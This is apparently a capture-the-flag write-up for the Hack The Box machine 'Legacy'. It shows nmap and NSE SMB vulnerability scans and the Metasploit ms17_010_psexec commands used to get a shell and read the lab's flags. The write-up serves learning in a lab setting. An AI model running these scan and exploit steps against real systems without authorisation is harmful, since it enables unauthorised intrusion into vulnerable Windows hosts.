Legacy
info-card

Initial Enumeration

Like any other target, we'll start off with a quick port scan to see what we're working with:
1
nmap -sV 10.10.10.4
Copied!
Initial Nmap Scan
Looking at this output it's safe to say SMB is the target here. Let's take a closer look at this service using some NSE scripts:
1
nmap -p 139,445 --script=smb-vuln* 10.10.10.4
Copied!
SMB Vulnerability Scan
Bingo, now we just have to find ourselves an exploit. In the interest of time, we'll just use metasploit to exploit this vulnerability. I originally intended to show how to do this manually, but due to the older version of windows this box is running, I ran into a lot of issues. for a non-metasploit look at MS17-010 be sure to take a look at my write-up on blue. The first thing we'll do is start our msfconsole and validate that this exploit will work on this target:
1
# starting msfconsole
2
msfconsole
3
​
4
# the following happens inside the console:
5
use exploit/windows/smb/ms17_010_psexec
6
set RHOST 10.10.10.4
7
check
Copied!
MSF Exploit Validation

Exploitation

Exploitation from here on is pretty simple. So simple in fact that it just takes typing one word: exploit. While I really prefer to not use metasploit for learning purposes, I can't deny how convenient it makes common exploits like this:
Executing the exploit
With this we can either grab the flags using meterpreter commands, or spawn a shell with the command shell. With this we are able to read the flags:
Flags
Last modified 1yr ago